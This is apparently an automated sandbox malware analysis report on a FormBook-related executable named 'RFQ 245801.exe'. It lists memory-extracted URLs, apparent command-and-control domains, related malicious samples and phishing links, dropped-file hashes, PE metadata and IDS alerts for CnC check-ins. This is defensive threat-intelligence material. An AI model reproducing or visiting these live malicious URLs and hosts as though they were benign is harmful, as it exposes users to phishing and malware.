                                                                                                                    https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      http://www.lc-driving-school.netexplorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        https://android.notify.windows.com/iOSexplorer.exe, 00000006.00000000.1749071753.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://www.ridges-freezers-56090.bond/c24t/explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          http://www.khizmetlergirisyapzzz2024.netReferer:explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000006.00000000.1739582157.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              http://www.j88.travel/c24t/www.venir-bienne.infoexplorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                https://outlook.com_explorer.exe, 00000006.00000000.1749071753.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4159457016.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3115691066.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3483071267.000000000C5E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      http://www.lc-driving-school.net/c24t/explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        http://www.fontbureau.com/designersGRFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        http://schemas.miexplorer.exe, 00000006.00000000.1745616106.00000000098A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          http://www.fontbureau.com/designers/?RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          http://www.founder.com.cn/cn/bTheRFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          http://www.sx9u.shopexplorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            http://www.ilw.legalexplorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              http://www.fontbureau.com/designers?RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000006.00000002.4151697507.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                http://www.ealerslot.netReferer:explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://powerpoint.office.comcemberexplorer.exe, 00000006.00000000.1749071753.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4159457016.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3115691066.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3483071267.000000000C5E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://www.ilw.legalReferer:explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    http://www.earing-tests-69481.bond/c24t/explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      http://www.orenzoplaybest14.xyzexplorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        http://www.tiro.comRFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          http://www.ridges-freezers-56090.bondexplorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            http://www.goodfont.co.krRFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
IP | Domain | Country | ASN | ASN Name | Malicious
188.114.96.3 | www.j88.travel | European Union | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1528045
Start date and time: 2024-10-07 14:46:08 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 3s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: RFQ 245801.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@13/6@11/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 121
• Number of non-executed functions: 317
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded the maximum time and may be missing disassembly code information.
• Report size exceeded the maximum capacity and may be missing behavior information.
• Report size getting too big: too many NtCreateKey calls found.
• Report size getting too big: too many NtEnumerateKey calls found.
• Report size getting too big: too many NtOpenKey calls found.
• Report size getting too big: too many NtOpenKeyEx calls found.
• Report size getting too big: too many NtProtectVirtualMemory calls found.
• Report size getting too big: too many NtQueryValueKey calls found.
• VT rate limit hit for: RFQ 245801.exe
Time | Type | Description
08:47:03 | API Interceptor | 1x Sleep call for process: RFQ 245801.exe modified
08:47:04 | API Interceptor | 15x Sleep call for process: powershell.exe modified
08:47:13 | API Interceptor | 7153848x Sleep call for process: explorer.exe modified
08:47:50 | API Interceptor | 6449769x Sleep call for process: NETSTAT.EXE modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
188.114.96.3 | 74qgPmarBM.exe | malicious | Pony | kuechenundmehr.com/x.htm
188.114.96.3 | PURCHASE ORDER-6350.exe | malicious | FormBook | www.cc101.pro/ttiz/
188.114.96.3 | http://revexhibition.pages.dev/ | malicious | HTMLPhisher | revexhibition.pages.dev/favicon.ico
188.114.96.3 | http://meta.case-page-appeal.eu/community-standard/112225492204863/ | malicious | Unknown | meta.case-page-appeal.eu/assets/k9854w4e5136q5a-f2169603.png
188.114.96.3 | http://www.tkmall-wholesale.com/ | malicious | Unknown | www.tkmall-wholesale.com/
188.114.96.3 | c1#U09a6.exe | malicious | Unknown | winfileshare.com/ticket_line/llb.php
188.114.96.3 | QUOTATION_OCTQTRA071244PDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/eZFzMENr/download
188.114.96.3 | QUOTATION_OCTQTRA071244PDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/eZFzMENr/download
188.114.96.3 | 1tstvk3Sls.exe | malicious | RHADAMANTHYS | microsoft-rage.world/Api/v3/qjqzqiiqayjq
188.114.96.3 | http://Asm.alcateia.org | malicious | HTMLPhisher | asm.alcateia.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.oko.events | hbwebdownload - MT 103.exe | malicious | FormBook | 185.26.122.70
www.oko.events | docs.exe | malicious | FormBook | 185.26.122.70
www.oko.events | Dekont.exe | malicious | FormBook | 185.26.122.70
www.oko.events | Quotation #10091.exe | malicious | FormBook | 185.26.122.70
www.oko.events | PAGO_200924.exe | malicious | FormBook | 185.26.122.70
www.j88.travel | 1024 Order.exe | malicious | FormBook | 188.114.97.3
www.j88.travel | hbwebdownload - MT 103.exe | malicious | FormBook | 188.114.96.3
www.j88.travel | docs.exe | malicious | FormBook | 188.114.96.3
www.j88.travel | SOA.exe | malicious | FormBook | 188.114.96.3
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | original.eml | malicious | Tycoon2FA | 188.114.96.3
CLOUDFLARENETUS | https://globalairt.com/arull.php?7088797967704b536932307466507a53354b54456b744b3872584b3037555338375031633872445172564277413d1 | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | 74qgPmarBM.exe | malicious | Pony | 188.114.96.3
CLOUDFLARENETUS | http://twbcompany.com | malicious | Unknown | 104.21.7.183
CLOUDFLARENETUS | https://danielvasconcellos.com.br/cliente2024 | malicious | Phisher | 188.114.97.3
CLOUDFLARENETUS | SecuriteInfo.com.Win64.Evo-gen.20301.32747.exe | malicious | Unknown | 104.26.0.5
CLOUDFLARENETUS | https://bono-sicherheitstechniksharefile.btn-ebikes.com/ | malicious | HtmlDropper | 104.18.95.41
CLOUDFLARENETUS | xwZfYpo16i.exe | malicious | LummaC, Amadey, Credential Flusher, Stealc | 172.67.206.204
CLOUDFLARENETUS | https://sportmansguilde.com/?https://www.office.com | malicious | HTMLPhisher |
                                                                                                                                                                                • 104.18.95.41
                                                                                                                                                                                Portal.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 162.159.140.238
                                                                                                                                                                                Process:C:\Users\user\Desktop\RFQ 245801.exe
                                                                                                                                                                                File Type:CSV text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):2056
                                                                                                                                                                                Entropy (8bit):5.342567089024067
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:MxHKlYHKh3ouHgJHreylEHMHKo/tHo6hAHKzeRHKx1qHxvKHj:iqlYqh3ou0aymsqwtI6eqzqqxwRiD
                                                                                                                                                                                MD5:E518150A4E0AC0BB13C49E3437CAD6D1
                                                                                                                                                                                SHA1:EEB063C4020BB91C4F546B0D5AF9C4C446212A53
                                                                                                                                                                                SHA-256:80F14F1E93CC189B336F3B86EB76B1F874F2B05A222EC8C21FA0ED7D0D207706
                                                                                                                                                                                SHA-512:FCC2CF289AB4DEFFBE34BC5F390DB69942C6563F859B97945995E8899DFE1306081B5B55AE54779AC4B6A57BA4B265638D497B847D41E44681DF4B3C497C0A78
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\4d760e3e4675c4a4c66b64205fb0d001\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\17470ef0c7a174f38bdcadacc3e310ad\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\
                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1172
                                                                                                                                                                                Entropy (8bit):5.3550249375369265
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:3OWSKco4KmZjKbmOIKod6emZ9tYs4RPQoUEJ0gt/NKIl9iagu:eWSU4xympjmZ9tz4RIoUl8NDv
                                                                                                                                                                                MD5:D66C47B8DC1712C9019C2CA1A29A7224
                                                                                                                                                                                SHA1:027D8E43DB55EB21BE139D06CCAD686648485565
                                                                                                                                                                                SHA-256:217A7B18569319440E4C429C91D9ECD917765DF0037D0CD19E3072BE7126BC38
                                                                                                                                                                                SHA-512:B2121B19348C8DD0204496EDA12D3416BE199284A307A13FEC0A7FD8FFD0F89511B9C110AE369049951ED27DD59E892153FE5E63600C3E7315A598DB5BB21F31
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                Entropy (8bit):7.923981643250274
                                                                                                                                                                                TrID:
                                                                                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                                                                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                File name:RFQ 245801.exe
                                                                                                                                                                                File size:713'736 bytes
                                                                                                                                                                                MD5:4be29153bc863fa6d2914aab9759e6aa
                                                                                                                                                                                SHA1:eb30dab7d18b7bbf2673573cc96da82f6374d85b
                                                                                                                                                                                SHA256:ffaa78a8a97885716e7dbe2a4a7ed9e1593ea5690f02f79f5d63c9b4964559da
                                                                                                                                                                                SHA512:f3b861ecec9500c4ef20a4750c78b7505d42be16a9bfc3473fd8270720409a7a331af4d423f7bffc3065873a654a23370ebc229ecbfad591dae5dbf2239a9e29
                                                                                                                                                                                SSDEEP:12288:P1A+f0e7eDuu9f8ZYDrQ1I6030Ro1JPCnW3tQsBRwdFKPQhilBr4E1Pm6/cOkR:Prx4rb30RovKW3rReFSQIv1Q6/u
                                                                                                                                                                                TLSH:38E41254271CE714C30D47F951D2C612A3B95A28FE5ACF387ACBB08D08E77156A32ADE
                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....b.g..............0......(........... ........@.. ....................... ............@................................
                                                                                                                                                                                Icon Hash:878eb7a3a6879fa4
                                                                                                                                                                                Entrypoint:0x4aa3d2
                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                Digitally signed:true
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                Time Stamp:0x6703621E [Mon Oct 7 04:22:54 2024 UTC]
                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                OS Version Major:4
                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                File Version Major:4
                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                                Signature Valid:false
                                                                                                                                                                                Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                                                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                Error Number:-2146869232
Not Before:13/11/2018 00:00:00
Not After:08/11/2021 23:59:59
Subject Chain:
• CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                                                                                                                                Version:3
                                                                                                                                                                                Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                                                                                                                Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                                                                                                                Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                                                                                                                Serial:7C1118CBBADC95DA3752C46E47A27438
Instruction (entry point disassembly)
jmp dword ptr [00402000h]
add byte ptr [eax], al
(the line above is repeated 97 times in the report: the bytes following the entry-point stub are zero padding, and 00 00 decodes as add byte ptr [eax], al)
Data directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xaa380 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xac000 | 0x246c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xaae00 | 0x3608 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb0000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xa83d8 | 0xa8400 | d503aa12c819c778c4fc37c3b62ed022 | False | 0.9173578542904903 | data | 7.932697234212169 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xac000 | 0x246c | 0x2600 | 0a3b5d7b4e5ada3f7748dd075af5626a | False | 0.869140625 | data | 7.367091566139885 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xb0000 | 0xc | 0x200 | fc0cbfef40948809e337141340bf60ae | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Resources

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xac0c8 | 0x201d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9674005595426347
RT_GROUP_ICON | 0xae0f8 | 0x14 | data | | | 1.05
RT_VERSION | 0xae11c | 0x34c | data | | | 0.43838862559241704
Imports

DLL | Import
mscoree.dll | _CorExeMain
Suricata IDS alerts

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-07T14:47:43.845330+0200 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.4 | 49743 | 188.114.96.3 | 80 | TCP
2024-10-07T14:47:43.845330+0200 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.4 | 49743 | 188.114.96.3 | 80 | TCP
2024-10-07T14:47:43.845330+0200 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.4 | 49743 | 188.114.96.3 | 80 | TCP
2024-10-07T14:48:45.319943+0200 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.4 | 50012 | 185.26.122.70 | 80 | TCP
2024-10-07T14:48:45.319943+0200 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.4 | 50012 | 185.26.122.70 | 80 | TCP
2024-10-07T14:48:45.319943+0200 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.4 | 50012 | 185.26.122.70 | 80 | TCP
TCP packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 7, 2024 14:47:43.390790939 CEST | 49743 | 80 | 192.168.2.4 | 188.114.96.3
Oct 7, 2024 14:47:43.395668983 CEST | 80 | 49743 | 188.114.96.3 | 192.168.2.4
